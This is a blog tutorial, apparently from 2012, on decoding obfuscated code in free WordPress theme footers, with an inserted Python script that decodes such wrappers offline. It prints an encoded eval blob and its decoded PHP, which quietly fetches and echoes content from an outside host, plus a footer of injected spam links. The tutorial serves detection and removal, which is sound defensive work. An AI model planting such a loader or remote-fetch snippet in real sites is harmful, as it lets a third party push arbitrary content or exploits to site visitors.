How to Decode a Free WordPress Theme Footer

By | July 5, 2012

Most of us use free software. That works well when you are able to change everything and even contribute to make the software better. The whole LAMP stack is open source, and you should never have to pay a penny to use it. The same goes for WordPress: you can download it for free from the official site and use it any way you like. There are also some “free” WordPress themes that are not as free as they seem at first sight. Let’s look at what you should avoid when using free WordPress themes.

First of all, you need to check all theme files. You should not accept any encrypted code, because you cannot know what it actually does. If any of your theme files are encrypted, decrypt them to make sure they’re safe. Here is a brief guide on how to do this.

First, locate the file that contains the encrypted code. It is usually in footer.php, but the code can be placed in other files as well. Use grep on Linux, or the search function on Windows, to detect the encoded files.

Let’s say we have found the file with the encrypted code. What do we do next?

Next we need to decrypt it. Here is the resource that allows you to decrypt PHP code.

In this sample, the footer.php I am trying to decrypt looks like this:

<? eval(gzinflate(base64_decode('vZHRasIwFIavV/AdQpCSglSvJ7INV3Aw0NV2N2MESU9tZpZTkuiE6bsvOrsibre7/c+X/3xJwBg03ECNxkm9ZINoGHTHWECePpIRoZVz9XW/r6ReFShWscD3vkDtQLu4ruobWYzCCq0b0XhtFGjhj7Iunyfpc5K+0EmWzfhkOs/oaxTTcG3kH2CaPOXJPON5+uDRYdAJZEkYk9ptFootwXFRLvlmYRhdKIUf3JfwEmvQNIrIbkdOpNSSe/o3KiJhSMq1Fk6i5rCV1llGS6mAH/u/b2UPfZ+d4ApEheT2Ysya14mGnWBPQFn4R9NGrnvS8V90VDyzOqm/odSM0h5p4HPji35xUPBWrl1S+f6f+HzHMbbgsPYDUfXI2E+ms4xPkrv7JO2RQYvBFsQBahOh0EIT7b8A'))); ?>

I have no idea what’s written there. That’s why I copy and paste the contents into the online Base64 Decoder. Here is the output:

error_reporting(0);
$CodeURL = "http://linkdock.com/content.php?id=&host=".urlencode($_SERVER["HTTP_HOST"])."&uri=".urlencode($_SERVER["REQUEST_URI"]);
if ((intval(get_cfg_var("allow_url_fopen")) || intval(ini_get("allow_url_fopen"))) && function_exists("file_get_contents")) {
    echo @file_get_contents($CodeURL);
} elseif ((intval(get_cfg_var("allow_url_fopen")) || intval(ini_get("allow_url_fopen"))) && function_exists("file")) {
    $content = @file($CodeURL);
    echo @join("", $content);
} elseif (function_exists("curl_init")) {
    $ch = curl_init($CodeURL);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_exec($ch);
    curl_close($ch);
}

If you analyze the code, you will see that it downloads something from an external site and shows it on mine. That might be acceptable if it is only some links, but what if they put an exploit there? I cannot take the risk of keeping this code on my site. In this case you can delete the whole encrypted code block and be sure you are now safe.
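The decode step can also be done offline, without pasting theme code into a third-party site and without executing it. The Python sketch below is an added example, not code from the original post: it reverses the eval(gzinflate(base64_decode(...))) wrapper shown above by base64-decoding and then raw-inflating the blob, and it peels nested layers. The function names are hypothetical, and the sample input is constructed by make_sample.

```python
import base64
import re
import zlib
from pathlib import Path

# Matches eval(gzinflate(base64_decode('...'))), straight or curly quotes.
WRAPPER = re.compile(
    r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*"
    r"['\"\u2018\u201c]([A-Za-z0-9+/=\s]+)['\"\u2019\u201d]\s*\)\s*\)\s*\)",
    re.IGNORECASE,
)

def unwrap(blob):
    """Base64-decode, then raw-inflate (PHP gzinflate). Nothing is executed."""
    raw = base64.b64decode(re.sub(r"\s+", "", blob))
    return zlib.decompress(raw, -zlib.MAX_WBITS).decode("utf-8", "replace")

def decode_source(source, max_layers=10):
    """Return the decoded payloads found in source, peeling nested wrappers."""
    results = []
    for match in WRAPPER.finditer(source):
        try:
            text = unwrap(match.group(1))
            for _ in range(max_layers):
                inner = WRAPPER.search(text)
                if inner is None:
                    break
                text = unwrap(inner.group(1))
        except (ValueError, zlib.error):
            continue  # not valid base64/deflate data; skip this match
        results.append(text)
    return results

def scan_theme(theme_dir):
    """Map each .php file under theme_dir to its decoded payloads."""
    found = {}
    for path in Path(theme_dir).rglob("*.php"):
        payloads = decode_source(path.read_text(errors="replace"))
        if payloads:
            found[str(path)] = payloads
    return found

def make_sample(php):
    """Constructed test input: wrap php the way the footer above is wrapped."""
    c = zlib.compressobj(9, zlib.DEFLATED, -zlib.MAX_WBITS)
    blob = base64.b64encode(c.compress(php.encode()) + c.flush()).decode()
    return "<? eval(gzinflate(base64_decode('%s'))); ?>" % blob

if __name__ == "__main__":
    print(decode_source(make_sample('echo "constructed payload";')))
```

Point scan_theme at the unpacked theme directory and read the returned text before deciding what to keep or delete.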

Let’s check another encoded footer. Here is what we get after decoding:

?><div>
    <div>
        <a href="<?php bloginfo('rss2_url'); ?>" title="RSS"></a>
        <div><p>
            Designed by <a href="http://www.collagen1.net">collagen</a> | <a href="http://www.projectswole.com/diet/70-protein-shake-recipes/">protein shakes</a> | <a href="http://resveratrolsite.org">resveratrol</a>
            | <a href="http://www.projectswole.com/diet/acai-berry-the-new-weight-loss-superfood/">acai</a><br />
            Copyright © 2009 <?php bloginfo('name'); ?>. All Rights Reserved.</p></div>
    </div>
    <div>
    </div></div>
    </div></div><p>
    </p></div><!-- <?php printf(__('%d queries. %s seconds.', 'kubrick'), get_num_queries(), timer_stop(0, 3)); ?> --><div><?php wp_footer(); ?></div></body></html><?

In this case we cannot simply delete the code, as that would break our theme. We need to extract the necessary HTML and put it in footer.php. Since we don’t want those links shown on the page, we will keep only the elements we need.

<div><div><a href="<?php bloginfo('rss2_url'); ?>" title="RSS"></a>
<div><p>  Copyright © 2009-2012 <?php bloginfo('name'); ?>. All Rights Reserved.</p>
</div>    </div>    <div>    </div></div>   </div></div><p>
</p></div><!-- <?php printf(__('%d queries. %s seconds.', 'kubrick'), get_num_queries(), timer_stop(0, 3)); ?> --><div><?php wp_footer(); ?></div></body></html>

That’s all! Now we have our site clear of any suspicious code.

In writing this post, I would like to mention that I understand the people who create free WordPress themes. But when a theme contains encrypted code, it is potentially dangerous and unsafe. So if you would like to support the theme author, you can leave the links in the footer, but only after you ensure the code is safe.

If you have any footers you cannot decrypt, please post them in the comments and I will help you decode them.